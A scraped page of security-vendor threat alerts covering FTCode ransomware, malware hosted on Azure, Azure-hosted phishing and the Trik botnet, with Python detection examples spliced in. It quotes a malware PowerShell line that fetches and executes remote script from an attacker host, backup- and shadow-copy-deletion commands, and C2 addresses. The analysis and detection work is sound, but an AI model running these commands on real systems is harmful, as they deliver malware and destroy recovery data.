<article><img src="/sites/default/files/2021-03/Ransomware.jpg" width="940" height="450" alt="people trading a key for money" loading="lazy" typeof="foaf:Image" /></article><p><strong>This article <a href="https://www.appriver.com/blog/ftcode-ransomware-drops-rocks-and-locks-files/" rel="nofollow">originally appeared</a> on the AppRiver blog.</strong></p> <p>A ransomware named FTCode is being used in email campaigns targeting Italian customers. These have been arriving posing as resumes, invoices, or document scans. 
While monitoring for new variants we spotted a Visual Basic script (.vbs) that departed from the norm of what we had recently been analyzing: it played music for us while encrypting files.</p> <h3><strong>Chain of Infection</strong></h3> <p>The .vbs file initially launches PowerShell (script below) to download and play an mp3 file from archive.org. At first glance we suspected it was just a renamed file extension for malware, a common practice to help evade some network gateways. However, we were amused to find it launches a Rammstein song mix. Rammstein is a German band formed in 1994 known for titles such as “Du Hast” and “Engel”. (More information about Rammstein’s music may be found at <a href="https://www.rammstein.de/en/" rel="nofollow">their site</a>.)</p> <p><code>"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = $env:temp + '\ramst007.mp3';(New-Object Net.WebClient).DownloadFile('https://archive.org/download/RammsteinRammsteinMix/Cast_1_64kb.mp3',$a); Start-Process $a;iex ((New-Object Net.WebClient).DownloadString('hxxp://ceco.myheritageins[.]com/?need=streetm&vid=vbs4&4643'));</code></p> <p>While you are rocking out to Rammstein, the script also reaches out to a different domain (myheritageins[.]com) to pull down another .vbs file. This one turns out to be the Jasper malware loader, which enables the actors to load additional malware of their choosing. In our test environment, it created a WindowsApplicationService.lnk shortcut in the Startup folder and utilized Windows Task Scheduler to achieve reboot persistence. At this point the malware will check to see if this file exists on the machine:</p> <p><code>C:\Users\Public\OracleKit\w00log03.tmp</code></p> <p>If the file does not exist, it will create it and send the encryption key and machine identification data to the attackers’ server. 
In the test environment it sent the information below:</p> <p><code>ver=1008.1<br /> vid=vbs4<br /> guid=0b802504-742f-42da-ae14-a6dda797aee3<br /> ext=df646e&ek=GuOd8Z6nvkC9eq2HJN0QUaBTjtlVSM7ybgzxImF1PDKXiA3w5L</code></p> <p>If the file (C:\Users\Public\OracleKit\w00log03.tmp) already exists, it surmises the machine has already been encrypted and the script does not run the ransomware. By creating this file and putting any data inside, users or administrators may be able to immunize the machine and prevent the ransomware from running. However, we anticipate attackers will add extra checks to help prevent this from occurring.</p> <p>Like other ransomware, FTCode will also run the following commands to ignore boot failures, disable recovery, and delete shadow volumes and system backups:</p> <p><code>"C:\Windows\system32\cmd.exe" /c bcdedit /set vbwfatdjw bootstatuspolicy ignoreallfailures<br /> "C:\Windows\system32\cmd.exe" /c bcdedit /set vbwfatdjw recoveryenabled no<br /> "C:\Windows\system32\cmd.exe" /c wbadmin delete catalog -quiet<br /> "C:\Windows\system32\cmd.exe" /c wbadmin delete systemstatebackup<br /> "C:\Windows\system32\cmd.exe" /c wbadmin delete backup<br /> "C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet</code></p> <p>The ransomware targets an extensive list of file extensions, impacting files of the following types greater than 50kb in size:</p> <p><code>.sql, .mp4, .7z, .rar, .m4a, .wma, .avi, .wmv, .csv, .d3dbsp, .zip, .sie, .sum, .ibank, .t13, .t12, .qdf, .gdb, .tax, .pkpass, .bc6, .bc7, .bkp, .qic, .bkf, .sidn, .sidd, .mddata, .itl, .itdb, .icxs, .hvpl, .hplg, .hkdb, .mdbackup, .syncdb, .gho, .cas, .svg, .map, .wmo, .itm, .sb, .fos, .mov, .vdf, .ztmp, .sis, .sid, .ncf, .menu, .layout, .dmp, .blob, .esm, .vcf, .vtf, .dazip, .fpk, .mlx, .kf, .iwd, .vpk, .tor, .psk, .rim, .w3x, .fsh, .ntl, .arch00, .lvl, .snx, .cfr, .ff, .vpp_pc, .lrf, .m2, .mcmeta, .vfs0, .mpqge, .kdb, .db0, .dba, .rofl, .hkx, .bar, .upk, .das, .iwi, .litemod, .asset, 
.forge, .ltx, .bsa, .apk, .re4, .sav, .lbf, .slm, .bik, .epk, .rgss3a, .pak, .big, wallet, .wotreplay, .xxx, .desc, .py, .m3u, .flv, .js, .css, .rb, .png, .jpeg, .txt, .p7c, .p7b, .p12, .pfx, .pem, .crt, .cer, .der, .x3f, .srw, .pef, .ptx, .r3d, .rw2, .rwl, .raw, .raf, .orf, .nrw, .mrwref, .mef, .erf, .kdc, .dcr, .cr2, .crw, .bay, .sr2, .srf, .arw, .3fr, .dng, .jpe, .jpg, .cdr, .indd, .ai, .eps, .pdf, .pdd, .psd, .dbf, .mdf, .wb2, .rtf, .wpd, .dxg, .xf, .dwg, .pst, .accdb, .mdb, .pptm, .pptx, .ppt, .xlk, .xlsb, .xlsm, .xlsx, .xls, .wps, .docm, .docx, .doc, .odb, .odc, .odm, .odp, .ods, .odt</code></p> <p>Files of these types are renamed with an .ftcode extension once encrypted. A ransom note is left on the desktop instructing the user to download and install a Tor browser and visit an onion site for further instructions. The onion site lets the visitor test decryption of one file before paying, an attempt to convince the victim that decryption is actually possible. The ransom starts at $500, climbs to $2,500 after 3 days, $5,000 after 5 days and $25,000 after 10 days, and the note threatens to delete the private key after 30 days, after which the files cannot be recovered.</p> <p>Ransomware wallet addresses are typically unique to each attack. Nevertheless, we checked the balance of one and it held no BTC at the time of writing.</p> <h3><strong>Be Vigilant</strong></h3> <p>Users should never click or open unsolicited links or documents, especially file types they are not familiar with, such as script files (.vbs, .js, .ps1, .bat, etc.). Any Office file that urges the user to Enable Content or Enable Editing once opened should be treated with the utmost caution and verified with the sender out of band first. 
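</p> <p>The six commands listed above are the most reliable host-side signal this family gives before encryption finishes, and they are easy to alert on from process-creation telemetry. The script below is an added example, not code from the original post or from the malware: it assumes Sysmon-style records carrying ParentImage and CommandLine fields (the records embedded in it are constructed, and the PowerShell parent is an assumption), and it maps each command to a label so an analyst sees which recovery mechanism was attacked.</p>

```python
"""Detect the recovery-inhibiting commands FTCode runs (MITRE ATT&CK T1490).

Added example, not code from the original post or from the malware. The
records below are constructed, Sysmon Event ID 1 style process-creation
lines carrying Image, ParentImage and CommandLine fields; the command
lines are the ones listed in the post. The parent process is an assumption.
"""
import re

# One rule per command. Each pattern runs over the lower-cased command line
# and tolerates "bcdedit" or "bcdedit.exe" and any options in between.
RULES = [
    ("bcdedit: ignore boot failures",
     re.compile(r"\bbcdedit(?:\.exe)?\b.*\bbootstatuspolicy\s+ignoreallfailures\b")),
    ("bcdedit: disable recovery",
     re.compile(r"\bbcdedit(?:\.exe)?\b.*\brecoveryenabled\s+no\b")),
    ("wbadmin: delete backup catalog",
     re.compile(r"\bwbadmin(?:\.exe)?\b.*\bdelete\s+catalog\b")),
    ("wbadmin: delete system state backup",
     re.compile(r"\bwbadmin(?:\.exe)?\b.*\bdelete\s+systemstatebackup\b")),
    ("wbadmin: delete backups",
     re.compile(r"\bwbadmin(?:\.exe)?\b.*\bdelete\s+backup\b")),
    ("vssadmin: delete shadow copies",
     re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b")),
]

CMDLINE_RE = re.compile(r"CommandLine:\s*(.+?)\s*$")
PARENT_RE = re.compile(r"ParentImage:\s*(\S+)")


def classify(cmdline):
    """Return the labels of every rule that matches one command line."""
    text = cmdline.lower()
    return [label for label, pattern in RULES if pattern.search(text)]


def scan(records):
    """Scan process-creation records; return (label, parent_image, command) hits."""
    hits = []
    for record in records:
        cmd = CMDLINE_RE.search(record)
        if not cmd:
            continue
        parent = PARENT_RE.search(record)
        parent = parent.group(1) if parent else "?"
        for label in classify(cmd.group(1)):
            hits.append((label, parent, cmd.group(1)))
    return hits


# The six command lines from the post, plus two benign look-alikes that must not fire.
FTCODE_COMMANDS = [
    r'"C:\Windows\system32\cmd.exe" /c bcdedit /set vbwfatdjw bootstatuspolicy ignoreallfailures',
    r'"C:\Windows\system32\cmd.exe" /c bcdedit /set vbwfatdjw recoveryenabled no',
    r'"C:\Windows\system32\cmd.exe" /c wbadmin delete catalog -quiet',
    r'"C:\Windows\system32\cmd.exe" /c wbadmin delete systemstatebackup',
    r'"C:\Windows\system32\cmd.exe" /c wbadmin delete backup',
    r'"C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet',
]
BENIGN_COMMANDS = [
    r'"C:\Windows\system32\cmd.exe" /c vssadmin list shadows',
    r'"C:\Windows\system32\cmd.exe" /c bcdedit /enum',
]


def make_records(commands, parent):
    """Build constructed Sysmon-style records for the given command lines."""
    return ["Image: C:\\Windows\\System32\\cmd.exe ParentImage: %s CommandLine: %s" % (parent, c)
            for c in commands]


# Constructed telemetry: a script host spawning cmd.exe once per command (assumed parent).
SAMPLE_RECORDS = (
    make_records(FTCODE_COMMANDS, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe")
    + make_records(BENIGN_COMMANDS, r"C:\Windows\explorer.exe")
)

if __name__ == "__main__":
    for label, parent, cmd in scan(SAMPLE_RECORDS):
        print("%-36s parent=%s  cmd=%s" % (label, parent, cmd))
```

<p>Match on the command line rather than on the process name alone: the same operations can be reached through other launchers, and the benign <code>vssadmin list shadows</code> and <code>bcdedit /enum</code> records in the sample deliberately produce no hits. A vaccine file of the kind described above stops only this version; a command-line alert fires regardless of how the sample changes its marker.</p> <p>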
If the file is malicious, enabling content or editing turns off Protected View and allows a payload embedded in the document to execute.</p> <p>If no backups are available to restore from, impacted users can also identify the ransomware family at <a href="https://id-ransomware.malwarehunterteam.com/" rel="nofollow">ID Ransomware</a> to see whether a public decryptor exists for it. If not, they can sign up for a notification in case one becomes available.</p> <p><a href="https://www.zixcorp.com/products/zixprotect" rel="nofollow">Learn how ZixProtect can help</a> keep your inbox safe from ransomware like FTCode, along with other advanced threats.</p> Thu, 17 Oct 2019 19:36:05 +0000 Threat Alert: Microsoft Azure Currently Hosting Malware /resources/blog/june-2019/threat-alert-microsoft-azure-currently-hosting-malware <span>Threat Alert: Microsoft Azure Currently Hosting Malware</span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="" xml:lang="">admin</span></span> <span>Mon, 06/03/2019 - 13:29</span> <a href="/resources/blog/threat-alert" hreflang="en">Threat Alert</a> <a href="/taxonomy/term/58" hreflang="en">David Pickett</a> <article><img src="/sites/default/files/2021-03/Azure-Storage-Attacks.jpg" width="940" height="450" alt="cloud image and phone" loading="lazy" typeof="foaf:Image" /></article><p><strong>This article <a href="https://blog.appriver.com/threat-alert-microsoft-azure-malware" rel="nofollow">originally appeared</a> on the AppRiver blog.</strong></p> <p>On Sept. 7, 2018, AppRiver <a href="https://blog.appriver.com/malicious-actors-abusing-microsoft-azure-storage-custom-domain-name-feature" rel="nofollow">detailed how malicious attackers </a>abused Azure's Custom Domain Name registrations to host credential phishing sites. 
On April 29, 2019, we <a href="https://www.zixcorp.com/resources/blog/april-2019/azure-customized-domain-name-phishing" rel="nofollow">released information</a> on how compromised user data was exposed by attacks originating from phishing sites hosted on Azure.</p> <p><strong>Now the attacks have escalated to malware being hosted on the Azure service. Not only is Azure hosting malware, it is also functioning as the command and control infrastructure for the malicious files.</strong></p> <p>On May 11, 2019, malware researchers <a href="https://twitter.com/JayTHL/status/1127334608142503936" rel="nofollow">@JayTHL & @malwrhunterteam discovered</a> the malicious software on Azure. It was <a href="https://twitter.com/JayTHL/status/1129573014498996224" rel="nofollow">reported to Microsoft</a> for abuse on May 12 via ticket #SIR0552640. However, the original malware (plus additional samples uploaded since) still resided on the Azure site as of May 29, 2019, 17 days later.</p> <h3><strong><em>Malware Agent Detected by Windows Defender</em></strong></h3> <p>No service is immune to abuse. It is evident that Azure is not currently detecting the malicious software residing on Microsoft's servers. However, if a user attempts to download the executables, Windows Defender <strong>does</strong> detect the malicious files.</p> <p>The first sample (searchfile.exe) was <a href="https://www.virustotal.com/en/file/036760d3a1b4760e9bf5527f0fed0e0a8bb98b6dbec3d5de7d8aba6afbeaf82b/analysis/1559158967/" rel="nofollow">uploaded to VirusTotal</a> on April 26, 2019. Windows Defender detects it as Trojan:Win32/Occamy.C. Azure itself, however, does not appear to scan hosted content; if it did, one would expect these files to have been detected by now. 
Another sample (printer/prenter.exe) was <a href="https://www.virustotal.com/en/file/f6e1e425650abc6c0465758edf3c089a1dde5b9f58d26a50d3b8682cc38f12c8/analysis/1559153391/" rel="nofollow">first submitted</a> on April 30, but it too remains undetected on Azure's servers.</p> <p>Analysis of printer.exe shows the sample is a simple .NET portable executable whose payload ships as uncompiled C# source. Shipping uncompiled code is an evasion attempt aimed at gateway and endpoint security products that scrutinize downloaded binaries closely but pay less attention to source text. On execution, the command line is invoked to run the built-in Visual C# compiler (csc.exe, shipped with the .NET Framework), and the freshly compiled payload is then activated.</p> <p>Once running, this malicious agent generates XML SOAP requests every 2 minutes to check in and receive commands from the malicious actors' Azure command and control site at: systemservicex[.]azurewebsites[.]net/data[.]asmx</p> <h3><strong>Zix Protection</strong></h3> <p>It only takes one malicious email to infiltrate your network or take your data hostage. Minimize that risk with the right solution, the right approach and the right people behind it. 
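</p> <p>A check-in every two minutes to a single host and path is detectable from web-proxy logs by its regularity alone, without any signature for the SOAP body. The script below is an added example, not code from the original post or from the malware; it assumes a simple "timestamp source method host path" log format (the records in it are constructed, with the C2 host and path named above and the two-minute cadence the post describes) and flags any source/host/path group whose gaps between requests have a low coefficient of variation.</p>

```python
"""Flag fixed-interval check-ins (beaconing) in web-proxy logs.

Added example, not code from the original post or from the malware. The
log lines are constructed, in an assumed 'timestamp src method host path'
format; the host and path are the C2 endpoint named in the post and the
120 s cadence is the two-minute check-in the post describes.
"""
from collections import defaultdict
from datetime import datetime
import statistics


def parse_line(line):
    """Parse one record into (datetime, src_ip, method, host, path)."""
    ts, src, method, host, path = line.split()
    when = datetime.fromisoformat(ts.replace("Z", "+00:00"))
    return when, src, method, host.lower(), path


def find_beacons(lines, min_hits=5, max_jitter=0.10):
    """Group requests by (src, host, path) and flag groups whose gaps between
    requests are near-constant (coefficient of variation <= max_jitter).
    Returns {(src, host, path): period_in_seconds}."""
    groups = defaultdict(list)
    for line in lines:
        when, src, _method, host, path = parse_line(line)
        groups[(src, host, path)].append(when)
    beacons = {}
    for key, times in groups.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        if statistics.pstdev(gaps) / mean <= max_jitter:
            beacons[key] = round(mean)
    return beacons


# Constructed proxy records. The first group is the implant checking in
# roughly every two minutes; the rest is ordinary, irregular browsing.
SAMPLE_LOG = [
    "2019-05-29T12:00:00Z 10.0.0.23 POST systemservicex.azurewebsites.net /data.asmx",
    "2019-05-29T12:02:01Z 10.0.0.23 POST systemservicex.azurewebsites.net /data.asmx",
    "2019-05-29T12:03:59Z 10.0.0.23 POST systemservicex.azurewebsites.net /data.asmx",
    "2019-05-29T12:06:00Z 10.0.0.23 POST systemservicex.azurewebsites.net /data.asmx",
    "2019-05-29T12:08:02Z 10.0.0.23 POST systemservicex.azurewebsites.net /data.asmx",
    "2019-05-29T12:09:58Z 10.0.0.23 POST systemservicex.azurewebsites.net /data.asmx",
    "2019-05-29T12:00:05Z 10.0.0.23 GET www.example.com /",
    "2019-05-29T12:00:35Z 10.0.0.23 GET www.example.com /",
    "2019-05-29T12:07:15Z 10.0.0.23 GET www.example.com /",
    "2019-05-29T12:07:20Z 10.0.0.23 GET www.example.com /",
    "2019-05-29T12:22:20Z 10.0.0.23 GET www.example.com /",
    "2019-05-29T12:23:20Z 10.0.0.23 GET www.example.com /",
    "2019-05-29T12:01:00Z 10.0.0.24 GET www.example.com /",
    "2019-05-29T12:03:00Z 10.0.0.24 GET www.example.com /",
]

if __name__ == "__main__":
    for (src, host, path), period in find_beacons(SAMPLE_LOG).items():
        print("%s -> %s%s every ~%ds" % (src, host, path, period))
```

<p>Real implants add jitter, so the tolerance is a parameter: at 10% the two-minute group is flagged while the irregular browsing from the same client is not, and tightening it to 1% drops the group again. Run it over a day of logs per client and review flagged groups by hand, since legitimate pollers (update checks, mail clients) surface the same way.</p> <p>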
With multi-layer protection and live email security experts, ZixProtect takes the guesswork out of keeping your email, employees and business safe from the latest threats.</p> <p><a href="https://www.zixcorp.com/products/zixprotect" rel="nofollow">Stop evasive malware campaigns in their tracks with ZixProtect</a>.</p> Mon, 03 Jun 2019 18:29:01 +0000 Microsoft Azure Customized Domain Name Phishing Attacks /resources/blog/april-2019/microsoft-azure-customized-domain-name-phishing-attacks <span>Microsoft Azure Customized Domain Name Phishing Attacks</span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="" xml:lang="">admin</span></span> <span>Mon, 04/29/2019 - 13:08</span> <a href="/resources/blog/threat-alert" hreflang="en">Threat Alert</a> <a href="/taxonomy/term/58" hreflang="en">David Pickett</a> <article><img src="/sites/default/files/2021-03/Azure-Storage-Attacks.jpg" width="940" height="450" alt="cloud image and phone" loading="lazy" typeof="foaf:Image" /></article><p>This article <a href="https://blog.appriver.com/microsoft-azure-customized-domain-name-phishing-attacks-compromised-users-and-geolocation-data-exposed" rel="nofollow">originally appeared</a> on the AppRiver blog.</p> <p>On Sept. 7, 2018, AppRiver <a href="https://blog.appriver.com/malicious-actors-abusing-microsoft-azure-storage-custom-domain-name-feature" rel="nofollow">detailed how malicious attackers </a>abuse Microsoft Azure's Custom Domain Name registrations to host credential phishing sites.</p> <p>This is a "living-off-the-land" style attack: the phishing sites reside on Microsoft's own web servers, and the phishing emails are frequently sent from Microsoft's servers as well. 
Attackers are currently using .web.core.windows.net, .blob.core.windows.net, and .azurewebsites.net for these customized Azure domain name attacks.</p> <p>While researching the latest variants, we discovered some interesting finds that warrant an update to our <a href="https://blog.appriver.com/malicious-actors-abusing-microsoft-azure-storage-custom-domain-name-feature" rel="nofollow">previous threat alert</a>. The first was a successful attack in which 284 sets of user credentials, along with geolocation information, were exposed to the internet.</p> <p>The second was inevitable and anticipated: attackers began embedding these malicious links in attachments, which Zix and AppRiver's email security filters are capturing.</p> <h3><strong>Compromised User Data Exposed</strong></h3> <p>For this particular attack, the malicious actor registered office360outlooksupport as their Azure storage custom sub-domain. Following the link to the phishing site yields the all-too-familiar clone of the Microsoft login portal. It automatically pre-fills the recipient's address using the address embedded in the phishing email they received.</p> <p>Viewing the source code of the phishing portal, we could see the attacker was posting the stolen data to an external compromised site. Ironically, the compromised site receiving the credentials belonged to a website design company in Kathmandu, Nepal, which had no idea this was occurring. On navigating to the site, we found the attacker had left an open directory. This allowed us to browse the site structure, where we noticed a file named "emails_and_pass.txt."</p> <p>Inside emails_and_pass.txt were 284 compromised users who had attempted to log in to the phishing portal, along with their geolocation data. While the attacker had gone to the effort of crafting the phishing emails and site, they had left the stolen credentials open for anyone to see. 
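</p> <p>Checking the sign-in URL is the one user-side control that defeats this page, and the same check can run at a mail or web gateway before a user ever sees the link. The code below is an added example, not code from the original post: the official hosts and the abused Azure suffixes are those named in this post, the sample URLs are constructed, and it assumes the pre-filled address travels in the URL fragment or query, which the post does not state.</p>

```python
"""Classify a sign-in link against the official Microsoft login hosts and the
Azure hosting suffixes abused in these campaigns.

Added example, not code from the original post. The legitimate hosts and the
abused suffixes are the ones named in the post; the sample URLs are
constructed, and the assumption that the victim's address is carried in the
URL query or fragment is mine, not something the post states.
"""
import re
from urllib.parse import urlsplit

LEGIT_LOGIN_HOSTS = {"login.microsoftonline.com", "portal.office.com"}
ABUSED_SUFFIXES = (".web.core.windows.net", ".blob.core.windows.net", ".azurewebsites.net")
# Words a phisher puts in a storage-account or app name to look like Microsoft.
BRAND_TOKENS = ("office", "outlook", "microsoft", "365", "onedrive", "sharepoint")
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def classify_login_url(url):
    """Return (verdict, reason). Only an exact official host over https is 'legit'."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()  # hostname drops userinfo and port
    if parts.scheme != "https":
        return "suspicious", "not https"
    if host in LEGIT_LOGIN_HOSTS:
        return "legit", "official Microsoft sign-in host"
    if "@" in parts.netloc:
        return "suspicious", "userinfo before the real host (%s)" % host
    for suffix in ABUSED_SUFFIXES:
        if host.endswith(suffix):
            label = host[: -len(suffix)]
            if any(token in label for token in BRAND_TOKENS):
                return "suspicious", "brand lookalike on Azure hosting: " + label
            return "suspicious", "login page on Azure hosting (%s)" % suffix
    if any(legit in host for legit in LEGIT_LOGIN_HOSTS):
        return "suspicious", "official host name embedded in another domain"
    return "suspicious", "unknown sign-in host"


def prefilled_email(url):
    """Return an e-mail address carried in the query or fragment, if any."""
    parts = urlsplit(url)
    for blob in (parts.query, parts.fragment):
        found = EMAIL_RE.search(blob)
        if found:
            return found.group(0)
    return None


# Constructed links: one real portal, one lookalike storage account as in the post,
# and two classic URL tricks.
SAMPLE_URLS = [
    "https://login.microsoftonline.com/common/oauth2/authorize",
    "https://office360outlooksupport.web.core.windows.net/index.html#victim@example.com",
    "https://login.microsoftonline.com@evil.example/",
    "https://login.microsoftonline.com.example.net/",
]

if __name__ == "__main__":
    for link in SAMPLE_URLS:
        verdict, reason = classify_login_url(link)
        print("%-10s %-50s %s" % (verdict, reason, prefilled_email(link) or ""))
```

<p>The check treats only an exact match on the official hosts as legitimate; a host that merely contains "login.microsoftonline.com", a userinfo prefix before "@", or a brand word in an Azure storage sub-domain are all reported as suspicious. Pulling the pre-filled address out of the link also tells the responder which user was targeted before anyone submits a password.</p> <p>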
Many of these users had attempted to log in multiple times with different passwords. This gives attackers visibility into how those users have changed their passwords over time, which opens the possibility of further password attacks, such as guessing the next variation, against them.</p> <h3><strong>Azure Customized Domain Phishing Links Now Inside Attachments</strong></h3> <p>Since our previous threat alert, malicious actors have also begun inserting these Azure phishing links into Word and PDF attachments. Because the attachment only needs to carry a link, this makes it simple for an attacker to create weaponized PDFs without purchasing any PDF creation software.</p> <h3><strong>Zix & AppRiver Tips</strong></h3> <ul><li> <strong>Always check the Office 365 login portal URL you are using and only sign in at <a href="https://portal.office.com/" rel="nofollow">https://portal.office.com</a> or <a href="https://login.microsoftonline.com/" rel="nofollow">https://login.microsoftonline.com</a>.</strong></li> <li><strong><a href="https://docs.microsoft.com/en-us/office365/admin/setup/customize-sign-in-page?view=o365-worldwide" rel="nofollow">Add company branding</a> to the sign-in page to help reduce the risk of a user logging into a phishing site.</strong></li> <li> <p><strong>Set up <a href="https://docs.microsoft.com/en-us/office365/admin/security-and-compliance/set-up-multi-factor-authentication?view=o365-worldwide" rel="nofollow">multi-factor authentication for 365</a> users. 
In the event the credentials are compromised, this lessens the risk of the attacker being able to use them for malicious purposes.</strong></p> </li> <li> <p><strong>Leverage <a href="https://docs.microsoft.com/en-us/office365/securitycompliance/microsoft-secure-score" rel="nofollow">Microsoft Secure Score</a> to assist in improving security posture.</strong></p> </li> </ul> Mon, 29 Apr 2019 18:08:08 +0000 Phorphiex/Trik Botnet Campaign Packs a Strong Payload Punch /resources/blog/april-2019/phorphiextrik-botnet-campaign-packs-strong-payload-punch <span>Phorphiex/Trik Botnet Campaign Packs a Strong Payload Punch</span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="" xml:lang="">admin</span></span> <span>Tue, 04/09/2019 - 12:54</span> <a href="/resources/blog/threat-alert" hreflang="en">Threat Alert</a> <a href="/taxonomy/term/58" hreflang="en">David Pickett</a> <article><img src="/sites/default/files/2021-03/Phorphiex-Triknet.jpg" width="940" height="450" alt="hands on a keyboard" loading="lazy" typeof="foaf:Image" /></article><p>This article was <a href="https://blog.appriver.com/phorphiex/trik-botnet-campaign-leads-to-multiple-infections-ransomware-banking-trojan-cryptojacking" rel="nofollow">originally published</a> on the AppRiver blog.</p> <p>Few botnets can send such tremendous volumes and pack an infection chain as malicious as the Phorphiex worm/Trik botnet has this year.</p> <p>For 2019, the Mealybug threat group has garnered the most <a href="https://www.zdnet.com/article/emotet-trojan-tweaks-tactics-in-fresh-attack-wave/" rel="nofollow">media attention</a> with Emotet attacks. However, the Phorpiex/Trik botnet is not to be easily outdone. 
AppRiver filters have captured more than 1.4 million directly attached malicious messages this year, with 847,947 of those arriving since April 4, 2019.</p> <p>The infection chain for this attack packs a serious punch for unsuspecting users worldwide. It begins with a phishing email containing a zip file. Once the JavaScript file inside the zip is launched, it quickly loads the Phorphiex worm/trojan loader, Gandcrab ransomware, the Ursnif ISFB (Gozi) banking trojan, and the CryptoNight XMRig cryptocurrency miner.</p> <h3><strong>Phorphiex also known as Trik Botnet (SDBot Fork)</strong></h3> <p>The Phorphiex worm is a decade-old worm that historically spread via live chat (Windows Messenger / Skype) and USB storage drives. Most recently it <a href="https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/" rel="nofollow">made news due to a leaky server</a> that revealed 43,555,741 unique email addresses spread across 4.6 million domains. Lately it has been tracked under the alternative name Trik (SDBot fork), not to be confused with the Trickbot banking trojan.</p> <p>Trik uses IRC for its command and control communication and can download and run additional executables, brute-force email credentials, and use infected systems to further propagate spam and malicious payloads.</p> <p>The sample we inspected could disable anti-virus and firewall protection by modifying the Windows Security Center registry values AntiVirusOverride, UpdatesOverride, FirewallOverride, AntiVirusDisableNotify, UpdatesDisableNotify, AutoUpdateDisableNotify, and FirewallDisableNotify.</p> <p>It also contains basic anti-analysis capabilities to determine whether it is running in a malware research environment. 
Methods include comparing running processes to known analysis tools, checking folder names and user names, using the FindWindow API, and checking for a debugger via the IsDebuggerPresent function.</p> <h3><strong>Trik Botnet Phishing Emails</strong></h3> <p>The best thing going for users is that Trik spam emails are relatively simple to recognize. The sending addresses use a bogus name followed by two random digits, then @, then four random digits and .com.</p> <p>The names and numbers are drawn from lists hardcoded into Trik and follow a fixed structure. The subjects vary, but for this campaign the body contains the same smiley emoji and the attachment is always named PIC followed by a run of digits and -JPG.zip.</p> <h3><strong>Initial Payload (1.exe) - Gandcrab Ransomware v5.2</strong></h3> <p>Gandcrab is the most widely distributed ransomware via email so far this year. Its authors, known to some researchers as Pinchy Spider, update it continuously to evade anti-virus detection and run it as a Ransomware-as-a-Service (RaaS) business: Pinchy Spider takes a 60-70% cut of the profits made by the actors who use the software.</p> <p>New ransomware senders can also pay Pinchy Spider $100 for up to 200 victims during a two-month period. In addition, it is available to <a href="https://www.darkreading.com/endpoint/ransomwares-new-normal/d/d-id/1334172" rel="nofollow">license for $1200</a>, which lets more skilled attackers use their own logo and update the code as needed to help avoid detection. 
Since many different actors use Gandcrab, demanded ransom amounts vary widely and have been documented anywhere from <a href="https://www.zdnet.com/article/georgia-county-pays-a-whopping-400000-to-get-rid-of-a-ransomware-infection/" rel="nofollow">$250 to over $400,000</a>.</p> <p><a href="https://www.bleepingcomputer.com/news/security/gandcrab-decrypter-available-for-v51-new-52-variant-already-out/" rel="nofollow">Decryption software exists for many versions prior to 5.2</a>, but there is currently no way to decrypt this version for free. Version 5.2 was likely released in response to the decryption tool becoming publicly available.</p> <h3><strong>Cryptojacking Payload (2.exe) - CryptoNight XMRig Miner</strong></h3> <p><a href="https://www.csoonline.com/article/3253572/what-is-cryptojacking-how-to-prevent-detect-and-recover-from-it.html" rel="nofollow">Cryptojacking</a> is simply the unauthorized use of someone else's machine to mine cryptocurrency. Chaining a cryptocurrency miner into an attack that already includes ransomware and a banking trojan ensures profitability for the malicious actor.</p> <p>The open source <a href="https://github.com/xmrig/xmrig" rel="nofollow">XMRig</a> software mines the Monero cryptocurrency on CPU or GPU hardware. Bitcoin, by contrast, can only be mined effectively on expensive dedicated mining hardware. 
The CryptoNight algorithm that XMRig implements favors CPUs, so ordinary infected machines yield a higher monetary gain per successful attack.</p> <p>Captured JSON login communication, sent to 92.63.197.153:7575:</p> <p><code>{"id":1,"jsonrpc":"2.0","method":"login","params":{<strong>"login":"eeeb5d54-7880-42a7-b542-739bbc26cf4b","pass":"x","agent":"XMRig/2.13.1</strong> (Windows NT 6.1; Win64; x64) libuv/1.20.3 gcc/8.2.0","algo":["cn/r","cn/wow","cn/2","cn/1","cn/0","cn/half","cn/xtl","cn/msr","cn/xao","cn/rto","cn/gpu","cn"]}}</code></p> <h3><strong>Banking Trojan Payload (4.exe) - Ursnif / Gozi ISFB</strong></h3> <p>Ursnif / Gozi is one of the top global banking trojan threats and has been distributed worldwide since 2007. Its original Russian author, Nikita Kuzmin, <a href="https://www.reuters.com/article/us-usa-cybersecurity-gozi-idUSKCN0XT1ZL" rel="nofollow">was caught and ordered by a court</a> to pay $6.9 million in restitution; he served 37 months in prison before being released under undisclosed terms.</p> <p>Since then the Gozi source code has been leaked, improved and extended with new features. The current version is known as Ursnif / Gozi ISFB and is <a href="https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb" rel="nofollow">available on GitHub for anyone</a> to use. The attacks we see most often (besides Trik campaigns) are the <a href="https://www.darkreading.com/attacks-breaches/gozi-trojan-using-dark-cloud-botnet-in-new-wave-of-attacks/d/d-id/1331214" rel="nofollow">Dark Cloud botnet</a> distributing it in the form of <a href="https://unit42.paloaltonetworks.com/threat-brief-conversation-hijacking-spear-phishing/" rel="nofollow">conversation hijacking attacks</a> or <a href="https://www.malware-traffic-analysis.net/2017/12/29/index2.html" rel="nofollow">fake resumes</a>. 
